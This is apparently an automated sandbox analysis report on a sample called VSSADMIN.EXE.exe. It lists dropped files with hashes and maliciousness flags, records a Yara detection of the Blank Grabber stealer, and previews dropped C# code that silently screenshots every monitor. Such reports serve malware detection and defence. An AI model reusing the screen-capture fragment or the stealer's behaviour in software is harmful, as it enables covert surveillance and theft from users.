                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:XulhAbgFQ1/NGSS1xNDrxiRx8/CWpsVDIA35/Mw3kp0HIPCVnRn5YiSyvYPxWEu:XiGgF1TxbYecf5UcHIPCVnv7SyQPx
                                                                                                                                                                    MD5:2D461B41F6E9A305DDE68E9C59E4110A
                                                                                                                                                                    SHA1:97C2266F47A651E37A72C153116D81D93C7556E8
                                                                                                                                                                    SHA-256:ABBE3933A34A9653A757244E8E55B0D7D3A108527A3E9E8A7F2013B5F2A9EFF4
                                                                                                                                                                    SHA-512:EEF132DF6E52EB783BAD3E6AF0D57CB48CDA2EB0EDB6E282753B02D21970C1EEA6BAB03C835FF9F28F2D3E25F5E9E18F176A8C5680522C09DA358A1C48CF14C8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 59664
Entropy (8bit): 7.830958327898146
Encrypted: false
SSDEEP: 1536:UUOlRJUIp/i+OnIlnhKaK+DIKIPLP3n7SySPxH9F:pOpnomln0aK+0KIPLP3nUxdF
MD5: 1ADFE4D0F4D68C9C539489B89717984D
SHA1: 8AE31B831B3160F5B88DDA58AD3959C7423F8EB2
SHA-256: 64E8FD952CCF5B8ADCA80CE8C7BC6C96EC7DF381789256FE8D326F111F02E95C
SHA-512: B403CC46E0874A75E3C0819784244ED6557EAE19B0D76FFD86F56B3739DB10EA8DEEC3DC1CA9E94C101263D0CCF506978443085A70C3AB0816885046B5EF5117
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 109328
Entropy (8bit): 7.929995437995477
Encrypted: false
SSDEEP: 3072:rAXWq+Shd+pVgLxCmdrrrvYoVZPQxqrU1uIPOqpCT6x1:Q+Smip7YwVQsrU1nCq
MD5: A8952538E090E2FF0EFB0BA3C890CD04
SHA1: CDC8BD05A3178A95416E1C15B6C875EE026274DF
SHA-256: C4E8740C5DBBD2741FC4124908DA4B65FA9C3E17D9C9BF3F634710202E0C7009
SHA-512: 5C16F595F17BEDAA9C1FDD14C724BBB404ED59421C63F6FBD3BFD54CE8D6F550147D419EC0430D008C91B01B0C42934C2A08DAE844C308FEEC077DA713AC842E
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 36120
Entropy (8bit): 7.694581667669348
Encrypted: false
SSDEEP: 768:5rusWqAYiGR2VL0gdxwxpj9bTIPOICR5YiSyv4PxWEu:5ynqA/dL0gdxwX9bTIPOICf7SygPx
MD5: F10D896ED25751EAD72D8B03E404EA36
SHA1: EB8E0FD6E2356F76B5EA0CB72AB37399EC9D8ECB
SHA-256: 3660B985CA47CA1BBA07DB01458B3153E4E692EE57A8B23CE22F1A5CA18707C3
SHA-512: 7F234E0D197BA48396FABD1FCCC2F19E5D4AD922A2B3FE62920CD485E5065B66813B4B2A2477D2F7F911004E1BC6E5A6EC5E873D8FF81E642FEE9E77B428FB42
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 87824
Entropy (8bit): 7.919149468371103
Encrypted: false
SSDEEP: 1536:AUZZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6VWLZLpIPZ1887SyKPxN:AIvA5utzWfXE0V0ZK+K+QLHIPZ188ExN
MD5: 3798175FD77EDED46A8AF6B03C5E5F6D
SHA1: F637EAF42080DCC620642400571473A3FDF9174F
SHA-256: 3C9D5A9433B22538FC64141CD3784800C567C18E4379003329CF69A1D59B2A41
SHA-512: 1F7351C9E905265625D725551D8EA1DE5D9999BC333D29E6510A5BCA4E4D7C1472B2A637E892A485A7437EA4768329E5365B209DD39D7C1995FE3317DC5AECDF
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 26384
Entropy (8bit): 7.48274363176083
Encrypted: false
SSDEEP: 384:r0Psz9rLZgNhzHjlHv0vFTMwZa7gJXTDIPQUCNQHQIYiSy1pCQqIPxh8E9VF0Nyo:RihFP0tTHpDDIPQUCI5YiSyv3PxWEun
MD5: DECDABACA104520549B0F66C136A9DC1
SHA1: 423E6F3100013E5A2C97E65E94834B1B18770A87
SHA-256: 9D4880F7D0129B1DE95BECD8EA8BBBF0C044D63E87764D18F9EC00D382E43F84
SHA-512: D89EE3779BF7D446514FC712DAFB3EBC09069E4F665529A7A1AF6494F8955CEB040BEF7D18F017BCC3B6FE7ADDEAB104535655971BE6EED38D0FC09EC2C37D88
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 44312
Entropy (8bit): 7.711982997288045
Encrypted: false
SSDEEP: 768:fLQ8MABQVeC50swbKjNcoVApXo2gwl49wMvfscpZTfIPLwnFW5YiSyvhPxWEu:zTIt50swZoKp929fsiTfIPLwnFs7SyZ5
MD5: BCC3E26A18D59D76FD6CF7CD64E9E14D
SHA1: B85E4E7D300DBEEC942CB44E4A38F2C6314D3166
SHA-256: 4E19F29266A3D6C127E5E8DE01D2C9B68BC55075DD3D6AABE22CF0DE4B946A98
SHA-512: 65026247806FEAB6E1E5BF2B29A439BDC1543977C1457F6D3DDFBB7684E04F11ABA10D58CC5E7EA0C2F07C8EB3C9B1C8A3668D7854A9A6E4340E6D3E43543B74
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 57616
Entropy (8bit): 7.828956573011499
Encrypted: false
SSDEEP: 1536:vUoHNtQh2qxFtxAnHq70rF7VRUjCpcIPOQ397SyU8Pxp:vUiNtQhxAnMORUmOIPOQ39xxp
MD5: EB6313B94292C827A5758EEA82D018D9
SHA1: 7070F715D088C669EDA130D0F15E4E4E9C4B7961
SHA-256: 6B41DFD7D6AC12AFE523D74A68F8BD984A75E438DCF2DAA23A1F934CA02E89DA
SHA-512: 23BFC3ABF71B04CCFFC51CEDF301FADB038C458C06D14592BF1198B61758810636D9BBAC9E4188E72927B49CB490AEAFA313A04E3460C3FB4F22BDDDF112AE56
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 63760
Entropy (8bit): 7.859117864085156
Encrypted: false
SSDEEP: 1536:NHBhG6a7BLI9d70XIKNSTuGaLOIPC7s0K7Sy1Pxd:/hI67uIKNSTICIPC7sBDxd
MD5: 2089768E25606262921E4424A590FF05
SHA1: BC94A8FF462547AB48C2FBF705673A1552545B76
SHA-256: 3E6E9FC56E1A9FE5EDB39EE03E5D47FA0E3F6ADB17BE1F087DC6F891D3B0BBCA
SHA-512: 371AA8E5C722307FFF65E00968B14280EE5046CFCF4A1D9522450688D75A3B0362F2C9EC0EC117B2FC566664F2F52A1B47FE62F28466488163F9F0F1CE367F86
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 1847603
Entropy (8bit): 5.576587358103163
Encrypted: false
SSDEEP: 24576:mQR5pATu7xm4lUKdcubgAnyfbazZ0iwh9EpdYf9P3sLoThUdWQhuHHa:mQR5plxm+zJ5uUwQ5
MD5: E17CE7183E682DE459EEC1A5AC9CBBFF
SHA1: 722968CA6EB123730EBC30FF2D498F9A5DAD4CC1
SHA-256: FF6A37C49EE4BB07A763866D4163126165038296C1FB7B730928297C25CFBE6D
SHA-512: FAB76B59DCD3570695FA260F56E277F8D714048F3D89F6E9F69EA700FCA7C097D0DB5F5294BEAB4E6409570408F1D680E8220851FEDEDB981ACB129A415358D1
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 121387
Entropy (8bit): 7.618787730767029
Encrypted: false
SSDEEP: 1536:s9MWCXD1NbuF8RAXYgM5smBW4DV0Qe7vVBijA9iHR/SWSnMzuq/AhMW3eQ88YDl8:LDnbGK5vA4Re7vVBGAYHR/fp2eQRBU6v
MD5: D0920254796FF3C0FA70785EEB43643E
SHA1: BCAC44DAAEE04BA3364B9F926E6B2E963EF1F3DA
SHA-256: 405535B019A42D6CB102D100DAD541E9C17D7E2EC24CC767345BA06A14D290C8
SHA-512: 83C453123E8A787C1901D5E56765CA18F0BC7900C06368593D212336E1D88747AF2E071519CB212B00F8318683E7AA7F956A193820F71596C81563DB64E51CA6
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1192216
Entropy (8bit): 7.944105809686233
Encrypted: false
SSDEEP: 24576:OehIVnK0yupAu74grd7gqiAtpzdZveNuKF1CPwDv3uFfJR:SYupAm7d7gqNtpzzveNuM1CPwDv3uFff
MD5: DFFCAB08F94E627DE159E5B27326D2FC
SHA1: AB8954E9AE94AE76067E5A0B1DF074BCCC7C3B68
SHA-256: 135B115E77479EEDD908D7A782E004ECE6DD900BB1CA05CC1260D5DD6273EF15
SHA-512: 57E175A5883EDB781CDB2286167D027FDB4B762F41FB1FC9BD26B5544096A9C5DDA7BCCBB6795DCC37ED5D8D03DC0A406BF1A59ADB3AEB41714F1A7C8901A17D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 29968
Entropy (8bit): 7.677818197322094
Encrypted: false
SSDEEP: 768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5: 08B000C3D990BC018FCB91A1E175E06E
SHA1: BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256: 135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512: 8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 209688
Entropy (8bit): 7.925110241108709
Encrypted: false
SSDEEP: 3072:de9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNI2DglFjEW0wuDmxD:A99u/XRxpK8M111nEE0iGYzi9jd0wN
MD5: 8E8A145E122A593AF7D6CDE06D2BB89F
SHA1: B0E7D78BB78108D407239E9F1B376E0C8C295175
SHA-256: A6A14C1BECCBD4128763E78C3EC588F747640297FFB3CC5604A9728E8EF246B1
SHA-512: D104D81ACA91C067F2D69FD8CEC3F974D23FB5372A8F2752AD64391DA3DBF5FFE36E2645A18A9A74B70B25462D73D9EA084318846B7646D39CE1D3E65A1C47C4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1699608
Entropy (8bit): 7.993586114049122
Encrypted: true
SSDEEP: 24576:IzvTIooNigMzmPPExBYeZ0pqJx5F7vYNBw5K2RH9lVggq4lUTNeTVZXo3uYIPDhh:C9oNizvxB3ZAEx5ONCVwXUmeTVlv
MD5: 5792ADEAB1E4414E0129CE7A228EB8B8
SHA1: E9F022E687B6D88D20EE96D9509F82E916B9EE8C
SHA-256: 7E1370058177D78A415B7ED113CC15472974440D84267FC44CDC5729535E3967
SHA-512: C8298B5780A2A5EEBED070AC296EDA6902B0CAC9FDA7BB70E21F482D6693D6D2631CA1AC4BE96B75AC0DD50C9CA35BE5D0ACA9C4586BA7E58021EDCCD482958B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low

Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 630736
Entropy (8bit): 6.409476333013752
Encrypted: false
SSDEEP: 12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5: 9C223575AE5B9544BC3D69AC6364F75E
SHA1: 8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256: 90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512: 57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, Author: Joe Security
Reputation:low
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26384
Entropy (8bit):7.438368098774459
Encrypted:false
SSDEEP:768:UjW1JOQuL3pJbNIPQGCF5YiSyvnnPxWEuN:UjW1AnbNIPQGCL7SyvnPxa
MD5:90FEA71C9828751E36C00168B9BA4B2B
SHA1:15B506DF7D02612E3BA49F816757AD0C141E9DC1
SHA-256:5BBBB4F0B4F9E5329BA1D518D6E8144B1F7D83E2D7EAF6C50EEF6A304D78F37D
SHA-512:E424BE422BF0EF06E7F9FF21E844A84212BFA08D7F9FBD4490CBBCB6493CC38CC1223AAF8B7C9CD637323B81EE93600D107CC1C982A2288EB2A0F80E2AD1F3C5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:low
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):637720
Entropy (8bit):7.994077868940962
Encrypted:true
SSDEEP:12288:2VROCPPIR0z79c8aCucuAVbXiFHTiDheVoxz0u4d0M2A9UCC:2VERAc83uc1XiJly01hUCC
MD5:395332E795CB6ABACA7D0126D6C1F215
SHA1:B845BD8864CD35DCB61F6DB3710ACC2659ED9F18
SHA-256:8E8870DAC8C96217FEFF4FA8AF7C687470FBCCD093D97121BC1EAC533F47316C
SHA-512:8BC8C8C5F10127289DEDB012B636BC3959ACB5C15638E7ED92DACDC8D8DBA87A8D994AAFFC88BC7DC89CCFEEF359E3E79980DFA293A9ACAE0DC00181096A0D66
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:low
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):302872
Entropy (8bit):7.986772329138341
Encrypted:false
SSDEEP:6144:ik/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kik+V65:ikUfQJbUV2MhCwEQc5Np9zk+U5
MD5:C2556DC74AEA61B0BD9BD15E9CD7B0D6
SHA1:05EFF76E393BFB77958614FF08229B6B770A1750
SHA-256:987A6D21CE961AFEAAA40BA69859D4DD80D20B77C4CA6D2B928305A873D6796D
SHA-512:F29841F262934C810DD1062151AEFAC78CD6A42D959A8B9AC832455C646645C07FD9220866B262DE1BC501E1A9570591C0050D5D3607F1683437DEA1FF04C32B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:low
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:low
Preview:1
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):1.525382148408982
Encrypted:false
SSDEEP:96:oe8To9Eapxv//u29ikqnXxa3Itq273BzkTDnw3:o3IpV//u2QZo27V
MD5:BAD7730F6FDE1661858D7C76366933B1
SHA1:7679157DBA24CF0FD2DC03AE73611B04227EF8A5
SHA-256:9F5A853FAB80EF233F4382B3B07412D1077AF8985222BBF701C8A824BEE22AFB
SHA-512:B1B1E0C534D96138F8752936776C3A7FD08100C99B04C55A0D7F22D0688868829C784C34F319A9FBC8F18F54DEFC7E7B07C9E40734C7C48882FE0BDEC3C66E5E
Malicious:false
Reputation:low
Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):49152
Entropy (8bit):0.7876734657715041
Encrypted:false
SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                    SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.085971199934783
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryl8qak7YnqqG8bPN5Dlq5J:+RI+ycuZhNP8qakSG8bPNnqX
                                                                                                                                                                    MD5:B967146675FC0D6BFA494B56B7C6BEBC
                                                                                                                                                                    SHA1:A12EDF3BA2AF4092B53BDF27790CD415724B9677
                                                                                                                                                                    SHA-256:8A150D58F4B729D57CC6FA34DF37C27287B109016A2D5DA3B57800FEC764CE87
                                                                                                                                                                    SHA-512:D5E1BA12FD545165937311FDB8B11D4718C162DA206C4FC010707535412500568AFB2A1AFC5252492FB30604A0062A37610CBCC6DBA65D6BC827F0FA508DA80C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                     Preview:VS_VERSION_INFO resource (UTF-16 strings, binary padding stripped): Translation 000004b0, FileDescription (empty), FileVersion 0.0.0.0, InternalName ozweafg0.dll, LegalCopyright (empty), OriginalFilename ozweafg0.dll, ProductVersion 0.0.0.0, Assembly Version 0.0.0.0
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1004
                                                                                                                                                                    Entropy (8bit):4.154581034278981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                    Entropy (8bit):5.313883735902588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfwqNqoUWZEifwqNq2:V3ka6KOkqeFkOfww1EifwO
                                                                                                                                                                    MD5:C8F9F1E9BC764C8476EB205E6D6EC772
                                                                                                                                                                    SHA1:CDB9E34C66622CAEB33EA6F1C2550831C04E83A6
                                                                                                                                                                    SHA-256:74BAB8BD453DC773EE2804A4F5361B1749542DFFB857C4B3D621C2131BEBBDC9
